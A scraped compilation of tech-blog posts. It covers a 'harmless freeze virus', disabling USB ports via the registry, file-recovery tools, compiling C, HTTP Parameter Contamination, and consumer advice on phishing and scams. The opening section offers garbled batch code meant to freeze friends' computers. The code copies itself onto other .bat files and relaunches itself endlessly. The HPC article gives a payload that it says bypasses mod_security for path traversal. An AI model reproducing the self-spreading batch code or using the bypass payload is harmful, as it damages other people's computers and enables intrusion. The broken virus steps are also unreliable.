How to Create a Harmless Freeze Virus

Steps

1. 
   
   
   Open Notepad or other word processor.
2. 
   
   
   Type on the first line, "start virus.bat," then, on the next
3. 
   
   
   type the following code:
   

   • @echo off
   • for %%f in (*.bat) do copy virus.bat+%%f
4. 
   
   
   if not exist c:\fr.htm echo
5. 
   
   
   c:\fr.htm #*start virus.bat # #Save the file as " want. # Open the file and it will open so many pointless windows, your computer will freeze.
6. 
   
   
   Shut down your computer and it will return to normal.
7. 
   
   
   Beware of angry friends
8. 
   
   Or try this one
9. 
    Open Notepad or other word processor.
10. 
    
    
    Type this in
    

    BEGIN
    

    

11. 
    
    
    ECHO Endless loop, Help!!
12. 
    
    
    GO TO BEGIN
13. 
    
    Then save as loop.bat
14. 
    
    Then when you open it it will keep looping Help!! and probably lag or crash a computer.
15. 
    
    If you want to stop it hit X.

Disable USB ports on Windows PC via Registry

With this trick, you can disable access to your USB(Universal Serial Bus) ports on your Windows based PC to prevent people from taking out data without permission or spreading viruses through the use of USB (pen and flash) drives.

To use this trick to disable USB ports, follow the steps given below:-

1. Click on Start.
2. Click on Run. If you cannot find RUN, type it in the search box.
3. Type "regedit" without quotes. This will launch the Registry Editor.
4. Navigate to  HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\usbstor.
5. In the work area, double click on Start.
6. In the Value Data box, enter 4.
7. Click on OK.
8. Close Registry Editor and refresh your desktop.
9. To re-enable access to your USB ports, enter 3 in the Value Data box in Step 6.

Try it yourself to make your PC invulnerable from data theft and malware which spread through USB ports. This works on Windows XP, Windows Vista, Windows 7 and Windows 8.

Note: This trick also disables access to your USB connected peripheral devices. So, do not use it if you have USB connected keyboard and mouse.

Recover Deleted files in Windows with Free Tools

Have you ever deleted a file that you did not wish to and wanted to recover it but did not find it in the recycle bin? You probably deleted it permanently with Shift+Delete or emptied the Recycle Bin. Now what? Don't worry, you may still have a chance to get it back. This article lists some free software that can recover deleted files from your hard drive or any other storage device instantly.

But how do the software mentioned below undelete deleted files?

When files are deleted, Windows does not delete them from your hard disk. It marks the storage space as empty for new data to be written and deletes the index entry that tells the location of those files. Unless, new files are written on that space, the deleted files are still recoverable. That's what allows these software to recover deleted files.

There are many free software that allow users to do this. Some of them are given below:-

1) Pandora Recovery

Pandora Recovery is a free software that offers a wizard based interface for recovering files. It allows you to browse a drive's individual folders to look for deleted files. It also allows you search for a deleted file based on its name, file size, creation date and last access time. Its deep scan allows you to recover files that other software might have missed. Although deep scan does not return a file's original name and location, it still is effective to recover data from drives with corrupted file tables and drives that were recently formatted. It can even recover data from CDs and DVDs.

2) TOKIWA DataRecovery

At just over 200KB, TOKIWA DataRecovery is the smallest file recovery program in the market. It supports undeletion from FAT 12, FAT16, FAT32 and NTFS file systems. It also supports recovering NTFS compressed and EFS encrypted files. This software supports Windows and is portable as well. It also has a file shredder that allows you to wipe out files in a manner that they cannot be recovered again.

3) Recuva

Another great freeware, Recuva offers a wizard based interface to unerase files. Recuva offers scanning deleted files based on their type (music, pictures, videos etc.). It also allows deep scanning in case a file you deleted is unrecoverable via normal search. Like TOKIWA DataRecovery, Recuva also offers securely deleting files. Recuva also has a portable version that you can keep in your flash drive.

All of these recovery software support recovery from memory sticks, digital camera cards and MP3 players. They support undeleting all types of pictures, software, movies and documents from both FAT and NTFS formatted drives. They work on Windows 8.1, Windows 8, Windows 7, Windows Vista and Windows XP.

Some important tips to increase the chances of getting your deleted files back:-

1) When a file is deleted accidentally on a storage device, make sure that you don't do anything on it as doing that would increase the chances of new data being written over your deleted files; which would make file recovery impossible.

2) If you have deleted files on your main computer (the one you are using right now), do not browse the internet, download new software or shut it down. Keep it running and go to another computer, download one of the software mentioned above that is portable and save it on a flash drive. Then plugin the flash drive in your current system and perform file recovery. Regardless of whether you accidentally delete files a lot or not, make sure to always have that software in your flash drive in case you accidentally delete important files.

3) If one software fails to recover your deleted file, it does not mean that another one wouldn't recover it too.

Lock a Folder With Password Using Free Folder Protector

All of us have some files and folders that we consider private. They can be anything from our business documents to pictures of friends and family. These are files that we don't want other people using our computer to know about. As Windows offers no way to protect our private information, most of us get in awkward situations when these files are discovered by unwanted people.

Surely, you can store this information in a hidden folder. The only problem is that anyone can easily search the contents of a hidden folder using Windows Search itself.

The only viable solution is storing this content in a password protected folder so that only those people knowing the password of the folder can access it. There are many folder locking programs available online but the problem is that most of the good ones are paid. Even if you do manage to get a good free one, you will be looked at suspiciously when people see a folder locker in the list of your installed programs.

If you too find yourself in a similar situation, you can try Folder Protector, a password protector for Windows folders that is not only free but is also portable meaning that it does not need to be installed. Just click on the exe file and the program will start running. I have created this program based on suggestions and feature requests that I have received by email over the last two years.

Folder Protector

Folder Protector offers each user a protected folder that can only be opened by entering the password in FolderProtector. Unlike most security programs, Folder Protector is small in size (nearly 58KB) and does not show the folder that it is protecting. This gives an additional advantage that people who don't know the password do not have a target to try and hack their way into. As the software is portable, you can hide it or even delete it after protecting your folder and no one will have a clue that it was used. Then whenever you need to access protected files, you can re-download the program from this page, enter the password and access your protected files.

Download Folder Protector

Download for Windows 8, Windows 7 and Windows Vista

Download for Windows XP


Important: 1) This program uses a simple method to lock files and should not be used to protect truly sensitive information. It is best to encrypt that kind of information.

2) Do not refresh your Windows when your folder is locked. Doing that will delete your files.

How to use Folder Protector?
When you run Folder Protector for the first time, the program will ask you for a password that you want to use. Enter a password that you can remember as this will be the password to your protected folder.

After entering the password, the program will open a folder named SecuredFILES. This is your protected folder. You can add all your private files in this folder. This folder is located at the Desktop. After adding all your files, you may close this folder.

Then, you can use the menu in the program to lock your folder. To lock the folder, type lock as your action. After successfully locking the folder, FolderProtector will display that the folder is locked.

Unlocking the protected folder is easy. Just type unlock as your action. Then the program will ask you to enter your password. Upon successfully entering the password, the program will display the contents of your protected folder.

Changing the Password: Just type change as your action. The program will ask you for your current password. Upon successful entry of the current password, the program will ask for your new password and change it instantly.

Acknowledgment: This software has been made possible only through the suggestions of readers of this blog, especially Ernell Albert Galido for his idea of using a menu based interface.

Windows Compatibility: This program has been successfully tested on Windows 8.1, Windows 8, Windows 7, Windows Vista and Windows XP.

Compiling C Program in window 7 using Command Prompt

C language was developed by Dennis Ritchie in 1969 to 1973. In beginning, C was developed as system programming language for Linux. C language is used for Linux kernel, libraries and all of its supporting tools.

For execute C program in window 7 using command prompt we have perform some.

Required tools for system:

1. Command Prompt
2.  Turbo C

Step:-1 Install Turbo C

Install Turbo C or TC in system. ( Download TC from here and copy TC folder into C drive)

Turbo C or TC file created in C drive.

Step:-2 Setup TC for Command Prompt.

Copy Bin directory path.

Open System property.

Set Environment variable path and its value.

Then press ok to close window.

Step:-3 Creating directory for C programs

Open targeted drive and create directory in which all c program will store. Suppose we are creating directory in D drive.

Step:-4 Open notepad and create C program.

Write c program and save with .c extension.

Step:-5 Open Command Prompt

Here we use tcc command for compile C program.

Executable file name will be same as c file name.

Output

How to run C program in Linux?

C language was developed by Dennis Ritchie in 1969 to 1973. In beginning, C was developed as system programming language for Linux. C language is used for Linux kernel, libraries and all of its supporting tools.

Step:-1 Creating .c file

Open gedit and write C program.

File name:- hello.c

#include<stdio.h>

int main()

{

          printf(“Hello Tycoons!!!”);

          return 0;

}

Step:-2 Open Terminal for run C program

Open Terminal window and then locate file location of c file.

Write following command for compile c program.

gcc hello.c –o hello

Note: Here we have used –o command for creating user define name object file, whatever name given after –o command will known as our object file. By default compiler will create a.out named object file.

Write following command for run c program.

./hello

Output

Hello Tycoons!!!

Actually Compiler will perform several phases for complete compilation of c program.

There are four phases.

1. Preprocessing
2. Compilation
3. Assembly
4. Linking

Let we perform all phases manually for same code.

1)    Preprocessing

For compilation of C program preprocessing is first step. In this phase, compiler will read header file, expanding macros and insert content of header file into program text. Preprocessing directives are #define, #include etc. #include contain header file. #define is known as macro.

cpp hello.c > hello.i

Here .c extension file is translated into .i extension file. .i extension file will contain source code and expanding macros.

2)    Compilation

In this phase compilation procedure will perform. Here .i extension file will translated into .s file. This .s file will contain assembly code.

gcc -S hello.i

Note: Here –S command will translate preprocessing code into assembly code without creating object file.

3)    Assembly

In this phase, Assembly code will translate into machine code. Here machine language code is contained in object file with extension .o.

as hello.s -o hello.o

4)  Linking

The final compilation phase will links object file to produce executable file.

ld -dynamic-linker /lib/ld-linux.so.2 /usr/lib/crt1.o /usr/lib/crti.o /usr/lib/crtn.o hello.o /usr/lib/gcc/i586-suse-linux/4.8/crtbegin.o -L /usr/lib/gcc/i586-suse-linux/4.8/ -lgcc -lgcc_eh -lc -lgcc -lgcc_eh /usr/lib/gcc/i586-suse-linux/4.8/crtend.o -o hello

Write following command for run executable file.

./hello

Output:

Hello Tycoons!!!

Defencely Explains HTTP Parameter Contamination

HTTP Parameter Contamination

---

In terms of application development during the standard phases, multi-tier application architecture is prevalent. The multi-tier architecture is a client-server architecture, where the presentation, the application processing and the data management is a complete separate processes. In basic terms, the multi-tier architecture are convenient for developers. The reason they are convenient for developers is the fact that developers have to re-use code and develop applications in which the whole application framework needn’t have to be written all over again. They could only modify parts of the application architecture based on tiers and profit flexibility in the use of such applications. The unfortunate part is the handling of the same data over multiple platform can lead to security breach, or leave the application vulnerable. Logical errors are triggered this way and are completely different from Injection based attacks such as:

• LDAP/Blind LDAP Injections
• XML Injection
• HTML Injection
• SQL Injection
• ORM based Injection
• Spring Injection/nHibernate Injection
• Xpath Injection
• Command Injection

All of the above mentioned ‘injection’ variants fall into code level application vulnerabilities and is completely different from ‘logical’ vulnerabilities which still have a greater level of impact on the web applications. During my old research at early phases of dissection behavioral pattern of different platform based application on different web-architectures, I found these led to couple of logical based vulnerabilities which could be used by an attacker for benefits. This lead self-curiosity to further research and I came up concluding something which already existed called ‘HTTP Parameter Contamination or HPC’. During my research at Defencely, I found out this particular attack methodology does not only rely on a specific platform but is widely used across many other different web based platforms, such as PHP on Apache, ASP.NET on IIS, etc.

HTTP Parameter Contamination Beneficial’s

---

Before I prove the absolute necessity for a manual application test, I must say, highlighting the beneficiaries of this particular vulnerability would be very essential to all of the security community in common. But before that, let’s see how applications are deployed in different ways and treated different way when handled or invoked for a ‘useful task’ to be accomplished. I want the readers to already know the primary basics of application deployment which is why I am taking the talk into the next steps which the reader must be already acquainted with. Web Architecture have become more complex and to keep everything simpler for the developers, the developers add layers (RAD Lifecycle) to re-use functions of those layers but this in itself could introduce security vulnerabilities. The diagram below would illustrate how a general application is deployed for convenience purposes:

In coherence with HTTP Parameter Pollution, which refers to additionally place query strings with the same name manipulating the logic how this newly formed query string is handled by a HTTP Handler of the web-server; there are possibilities HTTP Parameter Contamination attacks which target logical weaknesses of the web-architecture could be harnesses to benefit the attackers. This is where manual penetration testing review is an essential part of any security testing be it an application code review along with web-server logic review or a formal application penetration testing. To really harness the power of HTTP Parameter Contamination, a penetration tester or the attacker must have a deeper know-about of the HTTP and the HTTP Handler they are dealing with. Additionally, an attacker or the web penetration tester must know how HTTP Parameter Pollution attacks could be tested to give security or target an application for their beneficiaries. So what are these beneficiaries?

1. HTTP Parameter Contamination could be used to circumvent various Filters, security restrictions or regulations to bypass the Web Application Firewalls.
2. HTTP Parameter Contamination could be used by an attacker to benefit from the in-security a HTTP Handler might just throw such as informational application based web-server errors.
3. HTTP Parameter Contamination could be used by an attacker in parallel to existing vulnerabilities to bypass security rules and hence exploit these vulnerabilities.

For an example let a particular back-end ASP code be and assume mod_security as an application firewall is installed:

Using the payload: http://127.0.0.1/test.asp?file=.%./shritam_bhowmick.txt
It is possible to bypass the security restrictions which are provided by mod_security and hence accomplish path traversal attacks which were originally never possible. This (Path Traversal) in contrast with HTTP Parameter Contamination made such resilient attacks possible and hence actually manipulated the query somehow in order to accomplish the bypass using how HTTP traffic were handled by the HTTP Handler. This similarly could be used along with MS-SQL Injection wherein an IIS server using MS-SQL Databases could lead to critical compromise and hence cause a severe damage.
Example:

The pattern here to bypass the MS-SQL Injection which had previous security restrictions used HPC or HTTP Parameter Contamination. This could be as well be targeted towards PHP Interpreters.
An example back-end PHP code:

And Perl is no longer bulletproof:

The perl code along with HTTP Parameter Contamination applied gave these results:

Now, that I had proved my point across different application behaving in a different way using HTTP Parameter Contamination payloads, the take-away is to not use developer’s production time to keep them consuming development and rather actually focus on manual penetration test services to mitigate deeper issues which I had dealt with previous in large scale enterprise applications.Please Check Defencely talks about Application Deployment .

Defencely – Un-Breakable

Among application security in India, Defencely is the top playing company which has made it to proving its services globally in little time and with huge success stories to share. Defencely is an application security service provider and now have various services stared apart from application security. This includes:

• Web Application Security
• Network Security
• Mobile Security
• Business Logic Security

The no-nonsense security zone has just taken the lead with its vast expertise experience with a strong research department. Defencely’s primary vision is to provide ‘security’ at its best to its clients and conduct ‘security research’, discover new ways, innovate new security concepts and deliver the product of these to the valued clients. Defencely.com has not only made a strong Indian presence, but has also taken its services globally to make a profound impact on the Security Industry with rising expertise at what it does. The focus and the quality it delivers is amazingly an asset to any vendor taking its services and there has been a lot of buzz already among the leaders. To take the next step forward, Defencely is now headed from Texas with a strong presence in India and U.S. It’s an essential recommendation for web-business needs as per security is concerned. Nothing could stand Defencely’s strong team.

Cyber Security

How Much Does the Avg Joe Need to Know About Cyber Security?

Cyber Security, Consumers are obsessed with having the best technological tools, whether it’s a tablet, smartphone, or the newest Mac. But the development and innovation in new technologies is opening doors to serious cyber security risks. The threats keep evolving and unfortunately, the average Joe can’t keep up.

Contrary to the popular belief, most gadgets and computer systems aren’t always hacked or compromised by geniuses. Cyber Security, Like criminals who first check to see if they can break into a home via an unlocked door before picking a dangerous route, successful cyber criminals often achieve their goals by exploiting known vulnerabilities.

Need to Know About Cyber Security

In recent years, cyber threats have become more sophisticated, with hackers entering the scene stealing personal data and financial information of consumers. And with new operating systems, computers and smartphones, e-criminals have an even wider range of devices to infect with viruses, malware and other malicious threats. Here are a couple of new risks:

Email phishing

Typical phishing cases involve consumers receiving an email appearing to be sent from a financial or government institution requesting personal information. The emails often include content that demands immediate attention to the situation by clicking on links, which appear to be for the web property of the institution.
Read: Are Children a Threat to Online Security?
However, consumers are redirected to phony websites in case of phishing, where they are asked for account numbers, social security numbers, and other personal details. Those behind the fraud can use such details to steal a person’s identity. IRS phishing warning is a recent example.

Social network risks

Being active on social media has become the way of life. While the realities of such changes on consumer lifestyle take hold, consumers have crossed a risky line in this new information sharing age. The primary cyber risk of using social media is the possibility of information misuse resulting from posting too much personal information online.
But that’s only one of the risks, cyber threats actor are using sophisticated tactics such as social engineering to compromise social accounts which leads to the disclosure of sensitive information that can be used to gain access to financial and other important accounts. Third-party applications on Facebook, Twitter and other social networks are also contributing to the risks, as hackers can infect malicious code in these applications to breach user privacy.

Ensuring protection against cyber risks

Steps required to mitigate these risks are the same for PC, mobiles and tablet users. The following measures will help:
Antivirus and malware protection
According to Trend Micro, consumers can benefit from antivirus programs that offer defenses against new web threats and risks resulting from social network use. Windows and Mac users can install virus-protecting programs to improve security. Look for an Antivirus for Mac free trail and similar free trials for other PC and mobile operating systems.
Read: Secure Your Computers from Prying Eyes
Limit amount of personal information
Avoid posting information online and on social networks that can be used for identity theft, such as a personal address or details of a company associated. In fact, users shouldn’t post any information they would not be comfortable with strangers finding about. Be considerate when posting images as well.
Evaluate privacy settings
Cyber Security, The default settings of some websites may allow anyone from public to see social profiles, but users can customize settings to restrict access to specific groups and people. Sites may change security periodically, so it is important to frequently review privacy settings to ensure settings are still appropriate.

Are Children a Threat to Online Security?

Are children a threat to online security? Recent evidence suggests that the education children receive for technology today and the experience they get with different types of technology is enabling them to take malicious actions from a much earlier age. When I attended school the education in terms of technology was incredibly basic, turn the machine on, operate internet explorer, use Microsoft word, and turn the computer off again. I recall one ‘IT lesson’ in primary school in which we spent more than forty minutes learning to copy and paste – with no mention of the keyboard shortcut I have come to use religiously in the years since.

Are Children a Threat to Online Security?

The fact of the matter is that we know a lot more than we used to the reason I didn’t learn much about computers in school was because my teachers didn’t know much about it. That isn’t the case these days, the teachers know a lot more and have much more information they are able and willing to pass on to their students and there are more opportunities for after school clubs and activities in which young people can learn to do even more with computers.
See Also: Importance of Software Updates
A number of schools, particularly in areas with higher populations and more technology based business, now offer clubs for students as young as nine, not just that teach them how to use computers but that teach them to code and build computers too. Potentially this means more skilled and intelligent children, and it’s hard to consider that a bad thing, but the children aren’t being told what they can and can’t do with these skills. A child is taught from a young age that they can’t take things that don’t belong to them; it’s stealing. But from a young person’s perspective this only applies to physical items that can be taken and held, not to virtual or intellectual items.
Children need to be taught to understand these things as much as being taught how to code. There have been cases of children as young as 11 writing software that looks like a cheat for a game, these are seen particularly often with MMORPGs. You think you’re putting in your username and password to get some free gold or some rare items, but you’re not. You’re just delivering your login details to the software developer, they’re using it to log into your account and steal your gold and rare items. Not a big deal; you lost out on some virtual stuff, it isn’t the thing law enforcement usually concern themselves with, but that doesn’t make it alright.

It is also apparent that young people know where to go to get potentially threatening hardware and software, as was demonstrated recently by a group of young teenagers from a Southern California school. Eleven students in total were expelled from the school having allegedly hacked into the teacher’s computers and changed their grades to achieve higher scores in the exams. This was done by placing a hardware key-logger onto a teacher’s computer, this of course recorded the data when the teacher typed their username and password and allowed the students to retrieve that information and access their grades and change them as well as access upcoming exams.
As a result of the ‘hack’ the school officials are having to re-examine more than 750,000 grades. This comes as no surprise; American schools have been proving the tech-knowledge of their youth for some time. A Los Angeles school presented the children with locked down iPads last year and quickly found that the children managed to unlock them in just a few minutes.
The anti-virus and security company AVG confirmed last year that children as young as 11 were writing malicious code to hack accounts on gaming sites (such as the MMORPG example given previously) and even social networking sites. There are of course a number of potential threats with this although of course it is worth noting that while children might not understand exactly why they shouldn’t be doing this they are unlikely to consider any particularly malicious uses for the data they have access to through these means.
Kate Critchlow is a young writer who is enthusiastic about technology, particularly IT protection and other such security areas when using the internet and mobile devices.

WhatsApp Online Scam Hits Facebook User’s Accounts

Online Scam Is Called Internet Fraud. As early as last year, Facebook users began to report see an advert that purported to allow them to install the popular messaging application WhatsApp on their desktop PC. As one of the world’s most commonly used mobile messaging apps to many this seemed like too tempting a prospect to turn down.

Online Scams WhatsApp

WhatsApp Online Scam

WhatsApp Online Scams

Upon clicking on the ad, the user was then directed to install an Android emulator called “Bluestacks” on their machine and also provide their mobile telephone number. Suffice to say, sometime later their mobile was charged with a whole raft of substantial premium rate SMS charges and the penny would drop that they had been the victim of an online scam.
This type of activity, known as social-engineering, relies on using peoples own desires, fears or innate reactions to fool and trick them into action that benefits the perpetrator. In the case above, this is providing a mobile number in the false belief they will be getting a service they really wanted.
One of the reasons this type of attack is so hard to guard against is that you can have the best antivirus and internet security software available and it cannot help. It is the user of the computer that is being tricked into providing information. For example, it is much easier to fool someone into giving you their password than it is to hack their system or guess their password. The vulnerability here isn’t the computer but the user’s desires and lack of proper scrutiny.In the case of the WhatsApp scam, it doesn’t take long to discover on the WhatsApp website that only mobile platform downloads exist.
Read: WhatsApp Tricks and Tips
Another example of social engineering is people calling your home number and claiming to be from Microsoft. They will tell you that your home PC is affected by a virus and that they will clean it off for you if you allow them to take remote control of your PC. Once connected they install malicious software. Often those doing the social engineering will focus on company management or those right at the top of an organization. The tenacity of socially engineered attacks like this is often what catches people off guard and susceptible to give their trust without proper scrutiny or security.
To avoid being tricked by social engineering, here are some simple steps you can take to maximize your internet security.

Contact can often come from a friend or a trusted colleague.

Many socially engineered scams highjack users inbox’s and send emails to unwitting targets from those email accounts. They will contain a link or attachment that is actually malicious software.
Read: WhatsApp Success Stories

Take your time.

Take Your Time

Spend a few extra minutes to check if the email makes sense and is the type of email this person normally sends you.The messages will often ask for help. Either as a personal appeal (e.g an ill child) or as part of a charity appeal.Always be on guard and if in doubt clarify with the person that they actually sent the email.

If you are prompted to download a file, check that it is from a genuine vendor (e.g Microsoft or Apple).

Try doing an internet search for the download and make sure others have not reported a problem.

Beware of “phishing” email scams.

Email Scam

This type of contact will appear to come from banks, schools, government agencies or a popular company.

Insure you have top antivirus software and internet security software.

While these cannot always stop you from becoming a target, they can give you the best line of defense if malicious software is installed on your computer. The first line of protection should always start with the user though.